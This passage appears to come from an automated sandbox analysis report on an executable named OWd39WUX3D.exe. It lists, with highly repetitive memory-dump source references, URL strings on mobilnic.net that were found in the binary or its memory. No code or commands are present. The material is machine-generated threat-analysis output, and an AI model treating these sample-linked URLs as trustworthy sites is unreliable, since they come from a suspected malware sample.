00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/alone/alone.php?id=69
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/alone/alone.php?id=8
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/article.php?id=70
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/article.php?id=71
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/article.php?id=72
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1400
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1479
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1647
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1648
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1649
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1650
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1766
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1869
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1879
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1883
